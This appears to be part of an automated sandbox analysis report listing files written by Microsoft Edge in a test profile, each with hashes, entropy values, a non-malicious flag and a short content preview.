                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):617
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9325179151892424
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYUtezaD3RUovhC+lvBOL0
                                                                                                                                                                                                                                                                                  MD5:AD15D72AA4792C14DDD002CED70E8245
                                                                                                                                                                                                                                                                                  SHA1:30D0E75166FDA7126A73480EE3222C193231B579
                                                                                                                                                                                                                                                                                  SHA-256:17A781FB31D3176491D9B277ADEEE5521972C68956A2271637BBCBFEB27D6A7D
                                                                                                                                                                                                                                                                                  SHA-512:20B8D19B529A392FE0CBB44844926210D98C477498377B8370AA3A3A763C047EF96BE341686406522868EF848C83EF5EF4792B17CDD0462D4680EDA542C8A54F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.122239041552267
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73R+uivFB1wkn23oH+Tcwtfrzs52KLlp3Rsq2Pwkn23oH+TcwtfrzAdIFUv:73pivyfYebs9LT3evYfYeb9FUv
                                                                                                                                                                                                                                                                                  MD5:BE8613537AC15CD07C1DAADA596B8C85
                                                                                                                                                                                                                                                                                  SHA1:A1F4AF6DE2D19A73F0768A442B582238543E8133
                                                                                                                                                                                                                                                                                  SHA-256:56DE74916B40B1F9A898451E2DC67E1A0AFE99F2C4BD719E0490EE8938B214E3
                                                                                                                                                                                                                                                                                  SHA-512:84F04AFA44D47579B201C74FC2EA3AB3B96F4C047FB5AB65EC0B011F7C939159C94EF920DB957142EBD13C7832368E6C6903209E0F8DB81A4FEBC833AE252BB5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.401 1eb0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2024/12/10-12:41:29.439 1eb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNljagalll:Ls3valll
                                                                                                                                                                                                                                                                                  MD5:AE4794B65BA66C46BDD64D9B0790677D
                                                                                                                                                                                                                                                                                  SHA1:811324316D1420C9BE22ADF753EBD9ED05AAFE12
                                                                                                                                                                                                                                                                                  SHA-256:B41DEF5828D0444569A1628E05446D1E0CB70877247FC53FCC57D80BEE24BE64
                                                                                                                                                                                                                                                                                  SHA-512:386970991A7C900A7F943066AD0DA696EC4D116E938C370EF2F9E813FFB9B8F7D5D8C9EDB7AB5603F5CF0582A5F34BF3B73924F8261D9A215C71B43BF70A6115
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................e.?F../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlwll:Ls3wll
                                                                                                                                                                                                                                                                                  MD5:8651605493A502F02921893C8F8E9AFE
                                                                                                                                                                                                                                                                                  SHA1:417CC6331EFB2D7D42A1A940F035CEE5EC63A9A9
                                                                                                                                                                                                                                                                                  SHA-256:A0C3186090A074E44E46E8DE654397F6808E553D787E1A089A32F605C4A1EC9D
                                                                                                                                                                                                                                                                                  SHA-512:F1F708D930D7BFDC1AC59B094075DD1245810AE03D2919E9341C40486EFDC3130D7E6220A2CAD06E7F2DADB5F87157255A9DE31ACE6490B3F1B8D21F98C229E2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.........................................[EF../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ebfc.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
